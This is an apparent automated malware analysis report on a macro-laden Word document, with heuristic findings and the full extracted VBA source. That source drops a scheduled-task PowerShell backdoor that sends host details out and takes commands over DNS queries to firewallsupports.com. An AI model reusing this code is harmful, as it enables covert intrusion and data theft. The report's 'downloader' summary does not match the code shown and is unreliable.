Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a87c1a87d90f7426…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 28.3 KB
Created: 2018-06-06 15:25:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2018-07-14
MD5: 03ae637d69b14eeb3b390bf57d870292
SHA-1: ab9bbe26f21b688c07fc776a4871da8d9a5e5c30
SHA-256: a87c1a87d90f742614c61cf4fb15fdc400d2212fd14e96cd55bb9c1a0f09220f
Risk score: 458

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro that executes automatically when the document is opened. The macro uses WScript.Shell and cmd.exe to construct and execute a PowerShell script. The script appears to be designed to download and execute a second-stage payload, as indicated by the creation of temporary files and the use of PowerShell commands. The presence of the Document_Open macro and the execution of PowerShell strongly suggest a malicious downloader.

Heuristics (11)

  • ClamAV: Doc.Downloader.Generic-6698329-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698329-0
  • VBA project inside OOXML (severity: medium; 8 related findings; rule: OOXML_VBA)
    Document contains a VBA project (VBA macros present)
  • Potential Shell call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Matched lines in script:
    command = "schtasks /create /sc minute /mo 5 /tn WindowsUpdateTolkit /tr " + Tempory
    Call Shell(command, 0)
  • WScript.Shell usage (severity: critical; rule: OLE_VBA_WSCRIPT)
    Matched lines in script:
    sss = sss + "Set o = CreateObject(@Wscript.Network@) " + vbCrLf
    sss = sss + "Set wshShell = CreateObject(@WScript.Shell@) " + vbCrLf
    sss = sss + "Arch = wshShell.ExpandEnvironmentStrings(@%PROCESSOR_ARCHITECTURE%@) " + vbCrLf
  • PowerShell reference in VBA (severity: critical; rule: OLE_VBA_PS)
    Matched lines in script:
    sss = sss + "windir = Environ(@windir@) " + vbCrLf
    sss = sss + "    Com = windir + @\syswow64\windowspowershell\v1.0\powershell.exe@ " + vbCrLf
    sss = sss + "Else " + vbCrLf
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    Matched lines in script:
    Dim sss As String
    sss = sss + "Set o = CreateObject(@Wscript.Network@) " + vbCrLf
    sss = sss + "Set wshShell = CreateObject(@WScript.Shell@) " + vbCrLf
  • cmd.exe reference in VBA (severity: high; rule: OLE_VBA_CMD)
    Matched lines in script:
    s = s + "$domain= $ran1 + $he + '.firewallsupports.com'" + vbCrLf
    s = s + "$get=cmd /c ping -n 1 $domain  " + vbCrLf
    s = s + "$regex = [regex] '\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b'" + vbCrLf
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro (severity: low; rule: OLE_VBA_DOCOPEN)
    Matched lines in script:
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    UserName = Environ("USERPROFILE")
  • Environ() call (env variable access) (severity: low; rule: OLE_VBA_ENVIRON)
    Matched lines in script:
    Private Sub Document_Open()
    UserName = Environ("USERPROFILE")
    Tempory = UserName + "\AppData\Local\Temp\TempSystemRecovery.vbs"
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 9837 bytes
SHA-256: 803ce39c2242dd0b3418c85e567cb3999a03cd7ab98e7edbb06cb09ac46a2e4f
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
UserName = Environ("USERPROFILE")
Tempory = UserName + "\AppData\Local\Temp\TempSystemRecovery.vbs"
Tempory0 = UserName + "\AppData\Local\Temp\SystemRecoverytolkit.ps1"
Tempory1 = UserName + "\AppData\Local\Temp\SystemRecovery.ps1"
Dim s As String
s = "function ran (){$chars = [char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'" + vbCrLf
s = s + "return [string](($chars[0..25]|Get-Random)+(($chars|Get-Random -Count 4) -join ''))}function hex($s){$r=''" + vbCrLf
s = s + " for ($i = 0; $i -lt $s.length; $i++){ " + vbCrLf
s = s + "    $ac=[int][char]$s[$i]" + vbCrLf
s = s + "    $r+= [Convert]::ToString($ac, 16)  } return $r}  function GetStarted(){if(Test-Path 'HKCU:\Software\Microsoft\Cashe'){$ran=(Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Cashe').index }elseif(Test-Path '$env:Userprofile\AppData\Local\Temp\UserProfileInfo'){$ran = Get-Content $env:Userprofile'\AppData\Local\Temp\UserProfileInfo'}else{$ran=Get-Random -Minimum 1000 -Maximum 9999" + vbCrLf
s = s + "    $ran ='d'+ $ran" + vbCrLf
s = s + "    New-Item -Path 'HKCU:\Software\Microsoft\Cashe' -ErrorAction SilentlyContinue" + vbCrLf
s = s + "    Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Cashe' -Name 'index' -Value $ran -ErrorAction SilentlyContinue" + vbCrLf
s = s + "    Set-Content -Path $env:Userprofile'\AppData\Local\Temp\UserProfileInfo' -Value $ran -ErrorAction SilentlyContinue}" + vbCrLf
s = s + "    $idm = 'd' + $ran" + vbCrLf
s = s + "$he = hex $idm" + vbCrLf
s = s + "$ran1=ran" + vbCrLf
s = s + "$domain= $ran1 + $he + '.firewallsupports.com'" + vbCrLf
s = s + "$get=cmd /c ping -n 1 $domain  " + vbCrLf
s = s + "$regex = [regex] '\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b'" + vbCrLf
s = s + "$tt=$regex.Matches($get) | %{ $_.value } " + vbCrLf
s = s + "$rt=$tt[0]" + vbCrLf
s = s + "if ($rt.split('.')[0] -eq '200'){$au=$env:username + '$'" + vbCrLf
s = s + "$au+=$env:computername + '$'" + vbCrLf
s = s + "$au+=(Get-WmiObject win32_computersystem).Domain + '$'" + vbCrLf
s = s + "$au+=(Get-WmiObject win32_computersystem).Model + '$'" + vbCrLf
s = s + "$sran=Get-Random -Minimum 30 -Maximum 60" + vbCrLf
s = s + "Start-Sleep -Seconds $sran" + vbCrLf
s = s + "$au= $au.replace(' ' , '%')" + vbCrLf
s = s + "send-dns $au 'a'}}" + vbCrLf
s = s + "function send-dns ([string]$au,[string]$in){ [int]$y = $au.length / 10" + vbCrLf
s = s + " $cu1=0 " + vbCrLf
s = s + " $cu2=0" + vbCrLf
s = s + " $lsm = New-Object System.Collections.ArrayList" + vbCrLf
s = s + " for ($i=0 ; $i -le $y ;$i++){ $cu1+=10" + vbCrLf
s = s + "    $pp='' " + vbCrLf
s = s + "    foreach($p in $au[$cu2..$cu1])   {      $pp+=$p     }   $cu2=$cu1 + 1" + vbCrLf
s = s + "   $lsm.Add($pp)   } $coun=100" + vbCrLf
s = s + " foreach ($t in $lsm) {$sran=Get-Random -Minimum 30 -Maximum 60" + vbCrLf
s = s + " Start-Sleep -Seconds $sran" + vbCrLf
s = s + "    $coun += 1" + vbCrLf
s = s + "    $data = hex $t" + vbCrLf
s = s + "    $idn = hex $ran" + vbCrLf
s = s + "    $he1 = hex $in" + vbCrLf
s = s + "    [string]$str = $coun" + vbCrLf
s = s + "    $seq = hex $str" + vbCrLf
s = s + "    $ran1 = ran" + vbCrLf
s = s + "    $domain= $ran1 + $he1 + $idn + $seq + $data + '.firewallsupports.com'" + vbCrLf
s = s + "  $get=cmd /c ping -n 1 $domain   } " + vbCrLf
s = s + "  $sran=Get-Random -Minimum 30 -Maximum 60" + vbCrLf
s = s + "Start-Sleep -Seconds $sran" + vbCrLf
s = s + "  $idm = 'f'+$ran" + vbCrLf
s = s + "  $he1 = hex $idm " + vbCrLf
s = s + "  $ran1=ran" + vbCrLf
s = s + "  $domain= $ran1 + $he1 + '.firewallsupports.com'" + vbCrLf
s = s + "$get=cmd /c ping -n 1 $domain   }GetStarted " + vbCrLf
Dim ss As String
ss = ss + "function ran (){$chars = [char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'" + vbCrLf
ss = ss + "return [string](($chars[0..25]|Get-Random)+(($chars|Get-Random -Count 4) -join ''))}function hex($s){$r=''" + vbCrLf
ss = ss + "for ($i = 0; $i -lt $s.length; $i++){    $ac=[int][char]$s[$i]" + vbCrLf
ss = ss + "$r+= [Convert]::ToString($ac, 16)  } return $r}function ttttt($data,$in,$coun){if(Test-Path 'HKCU:\Software\Microsoft\Cashe'){   $id=(Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Cashe').index      }elseif(Test-Path '$env:Userprofile\AppData\Local\Temp\UserProfileInfo')    {$id = get-Content $env:Userprofile'\AppData\Local\Temp\UserProfileInfo' }$sran=Get-Random -Minimum 30 -Maximum 60" + vbCrLf
ss = ss + "Start-Sleep -Seconds $sran" + vbCrLf
ss = ss + "$rnd = ran" + vbCrLf
ss = ss + "$id = hex $id" + vbCrLf
ss = ss + "$domain = $rnd + $in + $id + $coun + $data + '.firewallsupports.com'" + vbCrLf
ss = ss + "$get=cmd /c ping -n 1 $domain  " + vbCrLf
ss = ss + "$regex = [regex] '\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b'" + vbCrLf
ss = ss + "$tt=$regex.Matches($get) | %{ $_.value } " + vbCrLf
ss = ss + "$rt=$tt[0]" + vbCrLf
ss = ss + "return $rt    }   function send-dns ([string]$au,[string]$in){[int]$y = $au.length / 10" + vbCrLf
ss = ss + "$cu1=0 " + vbCrLf
ss = ss + "$cu2=0" + vbCrLf
ss = ss + "$lsm = New-Object System.Collections.ArrayList" + vbCrLf
ss = ss + "for ($i=0 ; $i -le $y ;$i++){ $cu1+=10" + vbCrLf
ss = ss + "$pp='' " + vbCrLf
ss = ss + "foreach($p in $au[$cu2..$cu1]){$pp+=$p}$cu2=$cu1 + 1" + vbCrLf
ss = ss + "$lsm.Add($pp)      }$coun=100" + vbCrLf
ss = ss + "foreach ($t in $lsm) { $coun += 1" + vbCrLf
ss = ss + "$tt = hex $t" + vbCrLf
ss = ss + "$inin = hex $in" + vbCrLf
ss = ss + "[string]$con = $coun " + vbCrLf
ss = ss + "$co = hex $con" + vbCrLf
ss = ss + "ttttt $tt $inin $co}$f=hex 'f'" + vbCrLf
ss = ss + "ttttt '' $f '' }function start-dns() {$q = hex 'q'" + vbCrLf
ss = ss + "$t9 =  ttttt '' $q ''" + vbCrLf
ss = ss + "if ($t9.split('.')[0] -eq '200'){$packet=''" + vbCrLf
ss = ss + "$count=0" + vbCrLf
ss = ss + "for ($i=1 ;$i -le $t9.split('.')[1] ; $i++){[string]$se = $i + 99" + vbCrLf
ss = ss + "$h = hex 'h'" + vbCrLf
ss = ss + "$sese = hex $se" + vbCrLf
ss = ss + "$t91 =  ttttt '' $h $sese" + vbCrLf
ss = ss + "if($t91 -eq ''){$t91 =  ttttt '' $h $sese" + vbCrLf
ss = ss + "if($t91 -eq ''){$t91 =  ttttt '' $h $sese" + vbCrLf
ss = ss + "if($t91 -eq ''){$t91 =  ttttt '' $h $sese}}} $packet +=  $t91 + '.'" + vbCrLf
ss = ss + "$count+= 1}}" + vbCrLf
ss = ss + "if ($count -eq $t9.split('.')[1]){[string]$oo=''" + vbCrLf
ss = ss + "foreach($qq in $packet.split('.')){if ($qq.length -ne 0){if ($qq -eq '0'){   [string]$oo +=' ' }else{  [string]$oo += [char][int]$qq  }}}   $oo = $oo -replace '%' , ' '" + vbCrLf
ss = ss + "[string]$u=CMD /C $oo '2>&1'" + vbCrLf
ss = ss + "$u=$u -replace ' ' , '%'" + vbCrLf
ss = ss + "if ($u.length -le 10){$r = hex 'r'" + vbCrLf
ss = ss + "$uu =hex $u" + vbCrLf
ss = ss + "$nu = hex '101'" + vbCrLf
ss = ss + "$t92 =  ttttt $uu $r $nu" + vbCrLf
ss = ss + "if ($t92.split('.')[0] -eq '200'){$f = hex 'f'" + vbCrLf
ss = ss + "ttttt '' $f ''}}else{send-dns $u 'r'}}}start-dns" + vbCrLf

Dim sss As String
sss = sss + "Set o = CreateObject(@Wscript.Network@) " + vbCrLf
sss = sss + "Set wshShell = CreateObject(@WScript.Shell@) " + vbCrLf
sss = sss + "Arch = wshShell.ExpandEnvironmentStrings(@%PROCESSOR_ARCHITECTURE%@) " + vbCrLf
sss = sss + "If Arch = @AMD64@ Then " + vbCrLf
sss = sss + "set Environ = wshShell.Environment(@Process@) " + vbCrLf
sss = sss + "windir = Environ(@windir@) " + vbCrLf
sss = sss + "    Com = windir + @\syswow64\windowspowershell\v1.0\powershell.exe@ " + vbCrLf
sss = sss + "Else " + vbCrLf
sss = sss + "    Com = @powershell.exe@ " + vbCrLf
sss = sss + "End If " + vbCrLf
sss = sss + "Set o = CreateObject(@Wscript.Network@) " + vbCrLf
sss = sss + "Set wshell = CreateObject(@WScript.Shell@) " + vbCrLf
sss = sss + "s = wshell.ExpandEnvironmentStrings(@%SYSTEMDRIVE%@) " + vbCrLf
sss = sss + "d=s&@\Users\@&o.UserName & @\AppData\Local\Temp\SystemRecovery.ps1@ " + vbCrLf
sss = sss + "dd=s&@\Users\@&o.UserName & @\AppData\Local\Temp\SystemRecoverytolkit.ps1@ " + vbCrLf
sss = sss + "command = Com + @ -WindowStyle hidden -ExecutionPolicy bypass -file @ + d " + vbCrLf
sss = sss + "set shell=createobject(@wscript.shell@) " + vbCrLf
sss = sss + "shell.run command,0 " + vbCrLf
sss = sss + "command1 = Com + @ -WindowStyle hidden -ExecutionPolicy bypass -file @ + dd " + vbCrLf
sss = sss + "set shell1=createobject(@wscript.shell@) " + vbCrLf
sss = sss + "shell1.run command1,0 " + vbCrLf

Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim oFile As Object
Set oFile = fso.CreateTextFile(Tempory1, True)
oFile.WriteLine s
oFile.Close

Dim fso1 As Object
Set fso1 = CreateObject("Scripting.FileSystemObject")
Dim oFile1 As Object
Set oFile1 = fso1.CreateTextFile(Tempory0, True)
oFile1.WriteLine ss
oFile1.Close
Dim ssss As String
ssss = Replace(sss, "@", """")
Dim fso2 As Object
Set fso2 = CreateObject("Scripting.FileSystemObject")
Dim oFile2 As Object
Set oFile2 = fso2.CreateTextFile(Tempory, True)
oFile2.WriteLine ssss
oFile2.Close

Dim d As String
Dim com As String
Dim str As String
Dim exec As String
Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
    com = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
    com = "powershell.exe"
End If

Dim command As String
command = "schtasks /create /sc minute /mo 5 /tn WindowsUpdateTolkit /tr " + Tempory
Call Shell(command, 0)

End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 24064 bytes
SHA-256: 3acd783dff01faf7b2b92996b99507906944aae2c2b33c98f083ddc328a064f0
Detection: ClamAV: Doc.Downloader.Generic-6698329-0
Obfuscation or payload: unlikely